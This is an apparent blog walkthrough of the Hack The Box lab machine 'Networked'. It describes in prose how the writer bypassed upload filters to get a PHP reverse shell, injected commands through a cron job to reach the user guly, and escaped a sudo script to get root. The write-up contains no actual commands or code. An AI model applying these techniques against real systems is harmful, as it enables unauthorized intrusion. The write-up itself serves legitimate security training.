Nov 16, 2019
Networked was a good introduction to the world of HTB. Generally discussed as the easiest of the active boxes at time of retirement there is nothing particularly complex with getting to root. Initial foothold involved byassing upload restrictions to get a reverse shell initiated. User pivot required abusing an existing cron job running as our user guly. Finally, root required leveraging a sudo script and escaping the constraints to execute arbitrary code as root.
Kicking it off with an NMAP scan.
Let's pop open the browser and take a look at what we can find.
Hum, didn't see very much so let's see if directory buster can discover anything further for us.
Awesome, look's like we potentially have some capability to upload files. Let's try uploading a php reverse shell from pentestmonkey.
After attempting a few different variants including tacking on .jpg to my .php it was still being blocked. Taking a step back I explored the remainder of the identified locations and backup provided an interesting item.
Well now isn't that interesting! A backup of the files being used for the site, including upload.php. Perfect, now we can take a look at restrictions imposed on the potential upload.
Now with an understanding of what the restrictions are we are able to follow along with this page and insert a GIF89a; at the top of the php reverse shell. It was successful and going to the photos.php page with a reverse listener active we are able to get our initial foothold.
Unfortunately this shell did not grant us access to the user flag so we need to figure out a pivot to the true user. After some initial enumeration I stumbled onto the following cronjob.
Now checking what the check_attack.php script actually does...
The interesting part is the exec line where we control the contents of $value. Carefully crafting a test file we should be able to arbitrarily execute code as the user guly. Let's give a shot.
Now with another nc listener setup, we wait for the cronjob to kick off.
With that user is done. Unto root!
Root was rather simple comparatively. With our guly shell we kick off another round of enumeration. Quickly find that there is a root sudo rule in place.
And taking a look at the changename.sh script:
Now giving it a test run let's see what happens.
Ok nothing too telling here. So let's go back to the code. Seems to be some general regex to avoid special characters that would allow encapsultation. After a few different tests I realized that \ escaped characters were being interpreted well. So let's see if we can chain together some execution as root using the technique.
And with that Network is in the books! Thanks folks, until next time.